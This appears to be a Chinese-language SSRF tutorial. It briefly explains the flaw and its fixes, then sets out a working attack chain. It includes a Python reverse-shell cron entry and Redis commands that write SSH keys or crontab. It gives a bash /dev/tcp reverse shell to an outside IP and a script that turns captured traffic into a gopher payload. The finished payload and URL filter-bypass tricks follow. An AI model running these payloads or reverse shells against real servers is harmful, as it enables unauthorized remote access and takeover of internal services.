ssrf漏洞,全称为服务端请求伪造漏洞,由于有的web应用需要实现从其它服务器上获取资源的功能,但是没有对url进行限制,导致可以构造非本意的url对内网或者其它服务器发起恶意请求。
ssrf漏洞的危害可以通过ssrf漏洞可以对内网或本地机器进行主机发现,服务版本探测或者针对内网或本地一些薄弱的应用进行攻击,同时利用ssrf漏洞还可以时服务器主动发起请求,从而做为一个攻击跳板或者绕过CDN找到其服务器的真实ip
file_get_contents(),fsockopen(),curl_exec()三个函数使用不当时将会造成ssrf
大部分 PHP 并不会开启 fopen 的 gopher wrapper file_get_contents 的 gopher 协议不能 URLencode file_get_contents 关于 Gopher 的 302 跳转有 bug,导致利用失败 curl/libcurl 7.43 上 gopher 协议存在 bug(%00 截断),经测试 7.49 可用 curl_exec() //默认不跟踪跳转, file_get_contents() // file_get_contents支持php://input协议
修复方法:
修复方案: • 限制协议为HTTP、HTTPS • 禁止30x跳转 • 设置URL白名单或者限制内网IP
反弹shell定时任务:
*/1 * * * * python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("127.0.0.1",8080));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
针对centos和ubuntu写定时任务的方法可能不同,具体见文章:
https://joychou.org/web/hackredis-enhanced-edition-script.html
通过SSRF还可以攻击redis和mysql
redis:
如果存在/root/.ssh目录,直接root权限写/root/.ssh/authorized_keys 如果不存在/root/.ssh目录,直接root写crontab定时任务
1.存在/root/.ssh目录
ssh-keygen -t rsa (echo -e "\n\n"; cat ~/.ssh/id_rsa.pub; echo -e "\n\n") > /tmp/foo.txt cat /tmp/foo.txt | redis-cli -h 192.168.1.100 -p 6379 -x set crackit redis-cli -h 192.168.1.100 -p 6379
192.168.1.100:6379>
config set dir /root/.ssh/
config get dir
config set dbfilename "authorized_keys"
save
quit
2.不存在/root/.ssh目录则写crontab
可进行利用的cron有如下几个地方: /etc/crontab 这个是肯定的 /etc/cron.d/* 将任意文件写到该目录下,效果和crontab相同,格式也要和/etc/crontab相同。漏洞利用这个目录,可以做到不覆盖任何其他文件的情况进行弹shell。 /var/spool/cron/root centos系统下root用户的cron文件 /var/spool/cron/crontabs/root debian系统下root用户的cron文件
这里记录一下如何将命令行下的指令转换为gopher协议的数据格式,方便ssrf使用,利用socat进行端口数据转发,原理:
经过4444端口转发的数据包将被送到6379端口,即相当于一个中间人端口
若写入crontab的sheel脚本如下:
echo -e "\n\n* * * * * bash -i >& /dev/tcp/192.168.1.34/7777 0>&1\n\n" | redis-cli -h $1 -p $2 -x set aaa redis-cli -h $1 -p $2 config set dir /etc/ redis-cli -h $1 -p $2 config set dbfilename crontab redis-cli -h $1 -p $2 save redis-cli -h $1 -p $2 quit
其中-x参数是接收标准输入也就是通过|管道的输出,即echo的这一条crontab指令
然后执行:
socat -v tcp-listen:4444,fork tcp-connect:localhost:6379
./rediscron.sh 127.0.0.1 4444
就会接收到:
此时只需要将其转换为gopher格式的数据:
根据转换规则:
如果第一个字符是>或者< 那么丢弃该行字符串,表示请求和返回的时间。 如果前3个字符是+OK 那么丢弃该行字符串,表示返回的字符串。 将\r字符串替换成%0d%0a 空白行替换为%0a
0d------回车符号------"/r"
0a------换行符号------"/n"
Windows 在行尾使用 CRLF (carriage return/line feed, 0d 0a)
UNIX 只使用 LF(0a)
转换脚本如下:
#coding: utf-8 import sys exp = '' with open("payload.txt") as f: for line in f.readlines(): if line[0] in '><+': continue # 判断倒数第2、3字符串是否为\r elif line[-3:-1] == r'\r': #如果该行只有\r,将\r替换成%0a%0d%0a if len(line) == 3: exp = exp + '%0a%0d%0a' else: line = line.replace(r'\r', '%0d%0a') # 去掉最后的换行符 line = line.replace('\n', '') exp = exp + line # 判断是否是空行,空行替换为%0a elif line == '\x0a': exp = exp + '%0a' else: line = line.replace('\n', '') exp = exp + line print exp
输出为:
*3%0d%0a$3%0d%0aset%0d%0a$3%0d%0aaaa%0d%0a$57%0d%0a%0a%0a* * * * * bash -i >& /dev/tcp/192.168.1.34/7777 0>&1%0a%0a%0a%0d%0a*4%0d%0a$6%0d%0aconfig%0d%0a$3%0d%0aset%0d%0a$3%0d%0adir%0d%0a$5%0d%0a/etc/%0d%0a*4%0d%0a$6%0d%0aconfig%0d%0a$3%0d%0aset%0d%0a$10%0d%0adbfilename%0d%0a$7%0d%0acrontab%0d%0a*1%0d%0a$4%0d%0asave%0d%0a*1%0d%0a$4%0d%0aquit%0d%0a%0a
此时已经生成了gopher的数据,然后直接拼接:
gopher://ip:6379/_+payload 注意要加_
然后就会在监听端就会收到返回的shell。
通过gopher打mysql的话,直接将含有sql语句的数据包的16进制编码为gopher协议格式,见以下链接:
https://xz.aliyun.com/t/4420#toc-3
绕过技巧:
@ 添加端口号 短网址绕过 指向任意IP的域名http://xip.io http://10.0.0.1.xip.io resolves to 10.0.0.1 www.10.0.0.1.xip.io resolves to 10.0.0.1 http://mysite.10.0.0.1.xip.io resolves to 10.0.0.1 foo.http://bar.10.0.0.1.xip.io resolves to 10.0.0.1 IP限制绕过 十进制转换 八进制转换 十六进制转换 不同进制组合转换 协议限制绕过 栗子 当url协议限定只为http(s)时,可以利用follow redirect 特性 <?php header("Location:gopher://127.0.0.1:6379/_");?> 构造302跳转服务, 结合dict:// file:// gopher://